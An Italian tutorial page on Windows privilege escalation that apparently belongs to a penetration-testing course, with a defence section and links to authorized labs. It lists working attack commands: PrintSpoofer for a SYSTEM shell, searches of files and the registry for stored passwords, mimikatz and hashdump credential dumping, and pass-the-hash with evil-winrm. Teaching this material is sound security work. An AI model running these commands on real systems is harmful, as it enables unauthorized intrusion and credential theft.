Home › Post-Exploitation › Privesc Windows
Privilege Escalation — Windows
Hai una shell su Windows come utente normale. Obiettivo: NT AUTHORITY\SYSTEM o Administrator.
Teoria
Su Windows i vettori tipici sono: servizi configurati male, privilegi "token" abusabili, credenziali salvate, software vecchio, e task pianificati. L'obiettivo massimo è SYSTEM (più potente di Administrator).
Passo 1 — enumeration automatica
# WinPEAS (equivalente di LinPEAS per Windows)
winPEASx64.exe
# oppure lo script PowerShell PrivescCheck / PowerUp
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
Passo 2 — controlli manuali
Chi sono e che privilegi ho
whoami /priv # privilegi del token
whoami /groups
systeminfo # versione/patch → cerca exploit (es. con wesng)
Privilegi abusabili da cercare: SeImpersonatePrivilege / SeAssignPrimaryToken → tecniche Potato (JuicyPotato, PrintSpoofer) per diventare SYSTEM.
# se hai SeImpersonatePrivilege:
PrintSpoofer64.exe -i -c cmd # → shell SYSTEM
Servizi configurati male
# unquoted service path: percorso con spazi e senza virgolette
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
# permessi deboli sul binario di un servizio → lo sostituisci
sc qc nomeservizio
Credenziali salvate
# file di risposta, config, registry
findstr /si password *.txt *.ini *.config
reg query HKLM /f password /t REG_SZ /s
# credenziali salvate di Windows
cmdkey /list
Passo 3 — hash e pass-the-hash
Con privilegi admin, dump degli hash NTLM (poi crackali con Hashcat -m 1000 o usali in pass-the-hash):
# in Meterpreter
hashdump
# o con mimikatz
sekurlsa::logonpasswords
# autenticarsi con l'hash senza conoscere la password
evil-winrm -i IP -u Administrator -H <hash_ntlm>
Difesa
- Path dei servizi tra virgolette, permessi corretti su binari/cartelle.
- Rimuovere
SeImpersonatedove non serve; LAPS per le password admin locali. - Patch (molte privesc sono CVE note), niente credenziali in chiaro nei file.
Lab autorizzati
THMWindows PrivEscMedioTutti i vettori principali con una VM Windows dedicata. THMWindows PrivEsc ArenaMedioPalestra completa di privesc Windows. THMBlueFacileExploit + migrazione a SYSTEM + hashdump: ciclo completo. Risorsa d'oro: HackTricks — Windows Privesc. Libri: Hacking Exposed – Windows, HackNotes – Windows Security Portable Reference. Vedi Risorse.